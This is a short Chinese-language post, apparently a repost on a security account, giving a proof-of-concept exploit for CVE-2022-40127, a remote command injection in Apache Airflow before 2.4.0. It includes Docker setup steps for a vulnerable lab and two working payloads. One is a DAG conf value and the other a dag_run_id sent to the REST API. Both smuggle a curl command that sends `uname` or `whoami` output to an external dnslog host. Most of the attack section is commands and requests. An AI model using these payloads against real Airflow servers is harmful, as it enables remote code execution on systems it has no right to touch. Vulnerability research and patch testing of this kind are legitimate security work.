查看原文
其他

CVE-2022-40127 Apache Airflow < 2.4.0 DAG RCE

Ots安全 2022-11-23

poc docker 环境:

mkdir CVE-2022-40127 && cd CVE-2022-40127 curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'#or wget https://github.com/Mr-xn/CVE-2022-40127/raw/main/docker-compose.yamlmkdir -p ./dags ./logs ./pluginsecho -e "AIRFLOW_UID=$(id -u)" > .envdocker-compose up airflow-initdocker-compose up -d#waiting some timesopen localhost:8080

POC 1

example_bash_operator

{"fxoxx":"\";curl `uname`.lxx2.535ld4zn.dnslog.pw;\""}

dnslog via


POC 2

curl -X 'POST' \ 'http://10.11.12.131:8080/api/v1/dags/example_bash_operator/dagRuns' \ -H 'accept: application/json' \ -H 'Content-Type: application/json' \ -d '{ "conf": {"dag_run": "api2"}, "dag_run_id": "id \"&& curl `whoami`.api222.535ld4zn.dnslog.pw", "logical_date": "2022-11-19T10:13:13.920Z"

}'

http://localhost:8080/redoc#tag/DAGRun/operation/post_dag_run

http://localhost:8080/api/v1/ui/#/DAGRun/post_dag_run

dnslog via

commit:

https://github.com/apache/airflow/pull/25960/files#diff-7c35dc3aa6659f910139c28057dfc663dd886dd0dfb3d8a971603c2ae7790d2a


links:

https://stackoverflow.com/questions/67110383/how-to-trigger-airflow-dag-with-rest-api-i-get-property-is-read-only-state

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存